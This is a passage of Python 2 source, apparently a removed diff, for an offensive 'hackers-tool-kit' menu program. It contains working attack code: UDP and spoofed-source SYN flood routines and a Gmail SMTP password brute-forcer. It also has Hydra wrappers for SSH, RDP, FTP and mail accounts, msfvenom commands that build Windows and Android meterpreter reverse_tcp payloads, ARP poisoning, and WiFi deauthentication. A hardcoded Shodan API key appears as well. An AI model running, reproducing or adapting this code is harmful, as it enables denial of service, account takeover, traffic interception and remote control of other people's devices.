hackers-tool-kit... [ * ]-[41%]" -import whois -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[45%]" -import json -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[47%]" -from urlparse import urlparse -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[50%]" -from re import search, sub -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[55%]" -import cookielib -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[56%]" -import socket -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[59%]" -from scapy.all import * -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[60%]" -from threading import Thread, active_count -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[63%]" -import random -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[67%]" -import string -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[70%]" -import signal -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[73%]" -import ssl -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[79%]" -import argparse -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[83%]" -import sys -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[86%]" -import socks -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[89%]" -import mechanize -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[90%]" -import requests -os.system("clear") -print "Starting hackers-tool-kit... [ *]-[94%]" -import time -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[96%]" -from datetime import datetime -now = datetime.now() -hour = now.hour -minute = now.minute -day = now.day -month = now.month -year = now.year -os.system("clear") -print "Starting hackers-tool-kit... [* ]-[99%]" -sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) -Gb = random._urandom(20000) -bytes = random._urandom(20000) -Kb = random._urandom(20000) -r = '\033[31m' -W = '\033[90m' -R = '\033[91m' -N = '\033[0m' -G = '\033[92m' -B = '\033[94m' -Y = '\033[93m' -LB = '\033[1;36m' -P = '\033[95m' -Bl = '\033[30m' -O = '\033[33m' -p = '\033[35m' -os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" -os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @unkn0wn_bali\a'") -os.system("service tor start") -os.system("service postgresql start") -os.system("clear") -def mainbanner(): - os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") - print N+"""\033[34m - .............. \033[0mtype ? for help\033[34m - ..,;:ccc,. - ......''';lxO. - .....''''..........,:ld; - .';;;:::;,,.x, - ..'''. 0Xxoc:,. ... - .... ,ONkc;,;cokOdc',. - . OMo ':ddo. - dMc :OO; - 0M. .:o. - ;Wd - ;XO, \033[93mCreated By @unkn0wn_bali On Instagram\033[34m - ,d0Odlc;,.. - ..',;:cdOOd::,. - .:d;.':;. - 'd, .' - ;l .. - .o - c - .' - .\033[92m - ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ - ██ ██ ▀▀▀██▀▀▀ ██ ██▀ - ██ ██ ██ ██▄██ - ████████ ██ █████ - ██ ██ █████ ██ █████ ██ ██▄ - ██ ██ ██ ██ ██▄ - ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m - ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ - ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ - ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ - ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - """.decode('utf-8') -def help(): - print B+""" -▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ - ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ - ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ - ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ -\033[0m ░ -? : displays this message -clear : clears screen except for banner -exit : exits script -restart : re run hackers-tool-kit -rebootl : reboot whole device -winload : windows reverse_tcp payload -andload : android reverse_tcp payload -command : execute terminal command -msfcon : metasploit console -set : setoolkit console -msfven : msfvenom -gmail : gmail bruteforce -insta : instagram bruteforce -fb : facebook bruteforce -hydra : Black-Hydra bruteforce -medusa : Medusa bruteforce -ipgrab : host to ip address -myip : show your ip -wifite : automated wifi hacker -reaver : reaver automated [ wifi hack ] -mon : put device in monitor mode -monoff : put device out of monitor mode -netdev : find all devices in your network -scannet : scan for networks around you -specnet : scan a specific network -port : scan for ports on a host -info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m -sysinfo : info about your system \033[91m ██ ██\033[0m -msfex : shows all metasploit exploits \033[91m ██ ██\033[0m -msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m -msfall : shows all metasploit modules \033[91m ██ ██\033[0m -udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m -tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m -syn : SYN flood / dos \033[91m █ █\033[0m -slowl : Slow Loris dos \033[91m █ █ \033[0m -ping : pings host \033[91m █ █\033[0m -multih : start a multi handler \033[91m █ █\033[0m -cupp : make wordlists \/ vvvvvvvvv \/ -vdir : view files of a directory -vpn : activate a vpn TIP: "ctrl c" usually stops a script if you dont want to keep running it -vpnoff : stop vpn -pidox : dox website -pingen : Generate a routers default pin -deauth : deauth attack / wifi jammer -macc : changes mac address -macoff : returns mac address to normal -arppois : ARP poisoning -sslscan : ssl scan a host -payload : make a metasploit payload of your choice -crunch : Make wordlists -traff : shows your internet traffic -resa : reset account password -resu : reset unix password -hashid : find the type of hash of a hash -wafwoof : check a web application for firewall -cloud : cloudflare bypass -brutex : auto bruteforce every service of a host -methelp : show meterpreter help -winbyp : windows defender bypass -exploit : use a metasploit exploit of your choice -phish : phishing automated -datalist: list all hosts & services in the database -msfev : shows all metasploit evasions -upgrade : fully update your linux os -nscript : use a nmap script -sshver : scan for ssh version on a host -chains : browse web anonymous via proxychains [proxychains setup required] -\033[91m---------------------------------------------------------------------------------\033[0m - """ -def winload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -def andload(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - pf = raw_input("Port: ") - na = raw_input("Name of File: ") - ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) - os.system(ak) -def gmail(): - #!/usr/bin/python - '''create by Ha3MrX''' - - import smtplib - from os import system - - def main(): - print '\033[93m=================================================' - print '\033[91m create by Ha3MrX ' - print '\033[93m=================================================' - print '\033[95m ++++++++++++++++++++ ' - print '\n ' - print '\033[92m _,. ' - print ' ' - print ' ' - print ' HA3MrX ' - print ' _,. ' - print ' ,` -.) ' - print ' ( _/-\\-._ ' - print ' /,|`--._,-^| , ' - print ' \_| |`-._/|| , | ' - print ' | `-, / | / / ' - print ' | || | / / ' - print ' `r-._||/ __ / / ' - print ' __,-<_ )`-/ `./ / ' - print ' \ `--- \ / / / ' - print ' | |./ / ' - print ' / // / ' - print ' \_/ \ |/ / ' - print ' | | _,^- / / ' - print ' | , `` (\/ /_ ' - print ' \,.->._ \X-=/^ ' - print ' ( / `-._//^` ' - print ' `Y-.____(__} ' - print ' | {__) ' - print ' () \033[91m V.1.0 ' - - main() - print '\033[0m[1] start the attack' - print '[2] exit' - option = input('==>') - if option == 1: - file_path = raw_input('path of passwords file :') - else: - system('clear') - exit() - pass_file = open(file_path,'r') - pass_list = pass_file.readlines() - def login(): - i = 0 - user_name = raw_input('target email :') - server = smtplib.SMTP_SSL('smtp.gmail.com', 465) - server.ehlo() - for password in pass_list: - i = i + 1 - print str(i) + '/' + str(len(pass_list)) - try: - server.login(user_name, password) - system('clear') - main() - print '\n' - print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' - break - except smtplib.SMTPAuthenticationError as e: - error = str(e) - if error[14] == '<': - system('clear') - main() - print '[+] this account has been hacked, password :' + password + ' ^_^' - - break - else: - print '[!] password not found => ' + password - login() -def port(): - n = raw_input("Enter Target: ") - os.system("nmap " + n) -def insta(): - insta = raw_input("USERNAME> ") - jl = raw_input("WORDLIST> ") - k = raw_input("THREADS> ") - ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) - os.system(ma) -def fb(): - facebook = raw_input("[EMAIL/ID->]: ") - word = raw_input("[WORDLIST->]: ") - ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) - os.system(ks) -def ipgrab(): - b = raw_input(Y+'Enter Host:\033[0m ') - ip = socket.gethostbyname(b) - print G+"------------------------\033[0m" - print N+"Host: ", b - print N+"IP: ", ip - print G+"------------------------\033[0m" -def myip(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) -def wifite(): - os.system("wifite") -def mon(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng start " + i) -def netdev(): - os.system("netdiscover") -def scannet(): - os.system("iwconfig") - m = raw_input("Select Interface: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - os.system("airodump-ng -w /root/SCAN " + m) - print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" - if j == "n": - os.system("airodump-ng " + m) -def info(): - params = [] - # Browser - br = mechanize.Browser() - - # Just some colors and shit - white = '\033[1;97m' - green = '\033[1;32m' - red = '\033[1;31m' - yellow = '\033[1;33m' - end = '\033[1;m' - info = '\033[1;33m[!]\033[1;m' - que = '\033[1;34m[?]\033[1;m' - bad = '\033[1;31m[-]\033[1;m' - good = '\033[1;32m[+]\033[1;m' - run = '\033[1;97m[~]\033[1;m' - - # Cookie Jar - cj = cookielib.LWPCookieJar() - br.set_cookiejar(cj) - - # Browser options - br.set_handle_equiv(True) - br.set_handle_redirect(True) - br.set_handle_referer(True) - br.set_handle_robots(False) - - # Follows refresh 0 but not hangs on refresh > 0 - br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) - br.addheaders = [ - ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] - - - print '''\033[1;31m - _________ __ __ __ - / _____// |________|__| | __ ___________ - \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ - / \| | | | \/ | <\ ___/| | \/ - /_______ /|__| |__| |__|__|_ \\\\___ >__| - \/ \/ \/\033[1;m''' - target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') - if 'http' in target: - parsed_uri = urlparse(target) - domain = '{uri.netloc}'.format(uri=parsed_uri) - else: - domain = target - try: - br.open('http://' + target) - target = 'http://' + target - except: - target = 'https://' + target - - def sqli(url): - print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run - br.open('https://suip.biz/?act=sqlmap') - br.select_form(nr=0) - br.form['url'] = url - req = br.submit() - result = req.read() - match = search(r"---(?s).*---", result) - if match: - print '%s One or more parameters are vulnerable to SQL injection' % good - option = raw_input( - '%s Would you like to see the whole report? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - print '\033[1;31m-\033[1;m' * 40 - print match.group().split('---')[1][:-3] - print '\033[1;31m-\033[1;m' * 40 - else: - print '%s None of parameters is vulnerable to SQL injection' % bad - - - def cms(domain): - try: - result = br.open('https://whatcms.org/?s=' + domain).read() - detect = search(r'class="nowrap" title="[^<]*">', result) - WordPress = False - try: - r = br.open(target + '/robots.txt').read() - if "wp-admin" in str(r): - WordPress = True - except: - pass - if detect: - print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) - detect = detect.group().split('">')[1][:-27] - if 'WordPress' in detect: - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - elif WordPress: - print '%s CMS Detected : WordPress' % info - option = raw_input( - '%s Would you like to use WPScan? [Y/n] ' % que).lower() - if option == 'n': - pass - else: - os.system('wpscan --random-agent --url %s' % domain) - else: - print '%s %s doesn\'t seem to use a CMS' % (info, domain) - except: - pass - - def honeypot(ip_addr): - result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} - honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr - try: - phoney = br.open(honey).read() - if float(phoney) >= 0.0 and float(phoney) <= 0.4: - what = good - else: - what = bad - print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) - except KeyError: - print '\033[1;31m[-]\033[1;m Honeypot prediction failed' - - def whoisIt(url): - who = "" - print '{} Trying to gather whois information for {}'.format(run,url) - try: - who = str(whois.whois(url)).decode() - except Exception: - pass - test = who.lower() - if "whoisguard" in test or "protection" in test or "protected" in test: - print '{} Whois Protection Enabled{}'.format(bad, end) - else: - print '{} Whois information found{}'.format(good, end) - try: - data = json.loads(who) - for key in data.keys(): - print "{} :".format(key.replace("_", " ").title()), - if type(data[key]) == list: - print ", ".join(data[key]) - else: - print "{}".format(data[key]) - except ValueError: - print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) - pass - - def nmap(ip_addr): - port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr - result = br.open(port).read() - result = sub(r'Starting[^<]*\)\.', '', result) - result = sub(r'Service[^<]*seconds', '', result) - result = os.linesep.join([s for s in result.splitlines() if s]) - print result - - def bypass(domain): - post = urlencode({'cfS': domain}) - result = br.open( - 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() - - match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) - if match: - bypass.ip_addr = match.group().split(' ')[1][:-1] - print '%s Real IP Address : %s' % (good, bypass.ip_addr) - - def dnsdump(domain): - res = DNSDumpsterAPI(False).search(domain) - print '\n%s DNS Records' % good - for entry in res['dns_records']['dns']: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - for entry in res['dns_records']['mx']: - print '\n%s MX Records' % good - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n\033[1;32m[+]\033[1;m Host Records (A)' - for entry in res['dns_records']['host']: - if entry['reverse_dns']: - print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) - else: - print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) - print '\n%s TXT Records' % good - for entry in res['dns_records']['txt']: - print entry - print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) - - - def fingerprint(ip_addr): - try: - result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() - match = search(r'"os_description": "[^<]*"', result) - if match: - print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) - except: - pass - - - ip_addr = socket.gethostbyname(domain) - print '%s IP Address : %s' % (info, ip_addr) - try: - r = requests.get(target) - header = r.headers['Server'] - if 'cloudflare' in header: - print '%s Cloudflare detected' % bad - bypass(domain) - try: - ip_addr = bypass.ip_addr - except: - pass - else: - print '%s Server: %s' % (info, header) - try: - print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) - except: - pass - try: - r.headers['X-Frame-Options'] - except: - print '%s Clickjacking protection is not in place.' % good - except: - pass - fingerprint(ip_addr) - cms(domain) - try: - honeypot(ip_addr) - except: - pass - print "{}----------------------------------------{}".format(red, end) - whoisIt(domain) - try: - r = br.open(target + '/robots.txt').read() - print '\033[1;31m-\033[1;m' * 40 - print '%s Robots.txt retrieved\n' % good, r - except: - pass - print '\033[1;31m-\033[1;m' * 40 - nmap(ip_addr) - print '\033[1;31m-\033[1;m' * 40 - dnsdump(domain) - os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) - try: - br.open(target) - print '%s Crawling the target for fuzzable URLs' % run - for link in br.links(): - if 'http' in link.url or '=' not in link.url: - pass - else: - url = target + '/' + link.url - params.append(url) - if len(params) == 0: - print '%s No fuzzable URLs found' % bad - quit() - print '%s Found %i fuzzable URLs' % (good, len(params)) - for url in params: - print url - sqli(url) - url = url.replace('=', '') - r = br.open(url).read() - if '' in r: - print '%s One or more parameters are vulnerable to XSS' % good - break - print '%s These are the URLs having parameters:' % good - for url in params: - print url - except: - pass -def sysinfo(): - os.system("ifconfig") - os.system("iwconfig") - os.system("neofetch") - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - gateway = gw[2] - host = socket.gethostname() - print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) -def msfex(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show exploits'""") -def udp(): - target = raw_input(N+"Target:\033[91m ") - ip = socket.gethostbyname(target) - port = input(N+"Port:\033[91m ") - os.system("service tor restart") - print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) - os.system("sleep 2s") - sent = 0 - print "KILLING %s CONNECTIONS"%(ip) - while True: - sock.sendto(Gb, (ip,port)) - sock.sendto(bytes, (ip,port)) - sock.sendto(Kb, (ip,port)) - sent = sent + 1 - port = port + 1 - print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) - if port == 65534: - port = 1 -def tcp(): - print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" - print "\n" - tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") - print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" - os.system("sleep 5") - os.system("python /root/hackers-tool-kit/tools/" + tcp) -def syn(): - def randomIP(): - ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) - return ip - - def randInt(): - x = random.randint(1000,9000) - return x - - def SYN_Flood(dstIP,dstPort,counter): - total = 0 - print "Packets are sending ..." - for x in range (0,counter): - s_port = randInt() - s_eq = randInt() - w_indow = randInt() - - IP_Packet = IP () - IP_Packet.src = randomIP() - IP_Packet.dst = dstIP - - TCP_Packet = TCP () - TCP_Packet.sport = s_port - TCP_Packet.dport = dstPort - TCP_Packet.flags = "S" - TCP_Packet.seq = s_eq - TCP_Packet.window = w_indow - - send(IP_Packet/TCP_Packet, verbose=0) - total+=1 - sys.stdout.write("\nTotal packets sent: %i\n" % total) - - - def info(): - - dstIP = raw_input ("\nTarget IP : ") - dstPort = input ("Target Port : ") - - return dstIP,int(dstPort) - - - def main(): - dstIP,dstPort = info() - counter = input ("Packets : ") - SYN_Flood(dstIP,dstPort,int(counter)) - - main() - -def ping(): - p = raw_input("Enter Host: ") - os.system("ping " + p) -def msfpa(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show payloads'""") -def msfau(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show auxiliary'""") -def multih(): - os.system("service postgresql start") - os.system("""msfconsole -x 'use multi/handler'""") -def msfall(): - os.system("service postgresql start") - os.sytem("""msfconsole -x 'show all'""") -def hydra(): - """ - This program is just a small program to shorten brute force sessions on hydra :) - But to be more satisfying results of the brute force. You better interact directly with hydra, - without having to use this black hydra console first: '). - If you find any errors in running our program. Can chat via facebook :). - Hydra is needed for the process of this program :). - """ - import sys, os, time - - # Restart #################### - def restart_program(): - python = sys.executable - os.execl(python, python, * sys.argv) - curdir = os.getcwd() - ############################## - - os.system("clear") - print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" - print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" - print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" - print G+"-----------------------------------------------------" - print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" - print R+" [*] Author: DedSecTL --- [*] Version 1.0" - print N+"c=={:::::::::::::::> Black Hydra Console" - print R+" [*] My FB : https://m.facebook.com/100004136748473" - print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" - print - print " ===|[ Brute Force ]|===" - print - print " [01] Cisco Brute Force " - print " [02] VNC Brute Force " - print " [03] FTP Brute Force " - print " [04] Gmail Brute Force " - print " [05] SSH Brute Force " - print " [06] TeamSpeak Brute Force " - print " [07] Telnet Brute Force " - print " [08] Yahoo Mail Brute Force " - print " [09] Hotmail Brute Force " - print " [10] Router Speedy Brute Force " - print " [11] RDP Brute Force " - print " [12] MySQL Brute Force " - print - print " [00] Exit" - print - bhydra = raw_input("[*] B-Hydra > ") - - if bhydra == '01' or bhydra == '1': - print - print " +---------------------------+" - print " | Cisco Brute Force |" - print " +---------------------------+" - print - print - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -P %s %s cisco" % (word, iphost)) - sys.exit() - - elif bhydra == '02' or bhydra == '2': - print - print " +---------------------------+" - print " | VNC Brute Force |" - print " +---------------------------+" - print - print - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) - iphost = raw_input("[*] IP/Hostname : ") - - elif bhydra == '03' or bhydra == '3': - print - print " +------------------------------+" - print " | FTP Brute Force |" - print " +------------------------------+" - print - print - user = raw_input("[*] User : ") - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '04' or bhydra == '4': - print - print " +------------------------------+" - print " | Gmail Brute Force |" - print " +------------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '05' or bhydra == '5': - print - print " +--------------------------------+" - print " | SSH Brute Force |" - print " +--------------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) - sys.exit() - - elif bhydra == '06' or bhydra == '6': - print - print " +-------------------------+" - print " | TeamSpeak Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) - sys.exit() - - elif bhydra == '07' or bhydra == '7': - print - print " +-------------------------+" - print " | Telnet Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) - sys.exit() - - elif bhydra == '08' or bhydra == '8': - print - print " +---------------------------+" - print " | Yahoo Brute Force |" - print " +---------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '09' or bhydra == '9': - print - print " +----------------------------+" - print " | Hotmail Brute Force |" - print " +----------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '10': - print - print " +-----------------------------+" - print " | Router Speedy Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) - sys.exit() - - elif bhydra == '11': - print - print " +----------------------------+" - print " | RDP Brute Force |" - print " +----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '12': - print - print " +-----------------------------+" - print " | MySQL Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) - - elif bhydra == '00' or bhydra == '0': - print "\n[!] Exit the Program..." - sys.exit() - - else: - print "\n[!] ERROR : Wrong Input" - time.sleep(1) - restart_program() -def cupp(): - os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") - print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" -def vdir(): - print "\n" - os.system("ls") - print Y+"! doesnt have to be these can be any directory !\033[0m" - print "\n" - h = raw_input("Directory Path: ") - print "\n" - print "--------------------------------------------------------------------------------------------------------------------------------------------" - os.system("ls " + h) - print "--------------------------------------------------------------------------------------------------------------------------------------------" - -def monoff(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng stop " + i) -def vpn(): - os.system("anonsurf start") - os.system("anonsurf myip") -def vpnoff(): - os.system("anonsurf stop") - os.system("anonsurf myip") -def slowl(): - de = raw_input("Delay: ") - tar = raw_input("RHOST: ") - port = raw_input("RPORT: ") - soc = raw_input("Sockets: ") - os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') - os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) - os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) - os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) - os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) - os.system('echo "run\n" >> slowl.rc') - os.system('msfconsole -r slowl.rc') - os.system('rm -rf slowl.rc') - -def pidox(): - print Y+"! USING FIREFOX !\033[0m" - os.system("sleep 2") - os.system("firefox https://pipl.com/") -def specnet(): - jk = raw_input("BSSID: ") - kj = raw_input("ESSID: ") - os.system("iwconfig") - k = raw_input("INTERFACE: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) - if j == "n": - a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) -def pingen(): - j = raw_input("Enter BSSID: ") - a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) - os.system(a) -def reaver(): - os.system("iwconfig") - j = raw_input("Select Interface: ") - k = raw_input("Enter BSSID: ") - a = 'reaver -i {0} -b {1} -vv'.format(j,k) - os.system(a) -def deauth(): - print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" - j = raw_input("Enter BSSID> ") - os.system("iwconfig") - k = raw_input("Enter Interface> ") - a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) - os.system(a) -def macc(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -r " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -def macoff(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -p " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -def arppois(): - - try: - os.system("iwconfig") - interface = raw_input("[*] Enter Interface: ") - victimIP = raw_input("[*] Enter Victim IP: ") - gateIP = raw_input("[*] Enter Router IP: ") - except KeyboardInterrupt: - print "\n[*] User Requested Shutdown" - print "[*] Exiting..." - os.system("clear") - mainbanner() - - print "\n[*] Enabling IP Forwarding...\n" - os.system("echo 1 > /proc/sys/net/ipv4/ip_forward") - - def get_mac(IP): - conf.verb = 0 - ans, unans = srp(Ether(dst = "ff:ff:ff:ff:ff:ff")/ARP(pdst = IP), timeout = 2, iface = interface, inter = 0.1) - for snd,rcv in ans: - return rcv.sprintf(r"%Ether.src%") - - def reARP(): - - print "\n[*] Restoring Targets..." - victimMAC = get_mac(victimIP) - gateMAC = get_mac(gateIP) - send(ARP(op = 2, pdst = gateIP, psrc = victimIP, hwdst = "ff:ff:ff:ff:ff:ff", hwsrc = victimMAC), count = 7) - send(ARP(op = 2, pdst = victimIP, psrc = 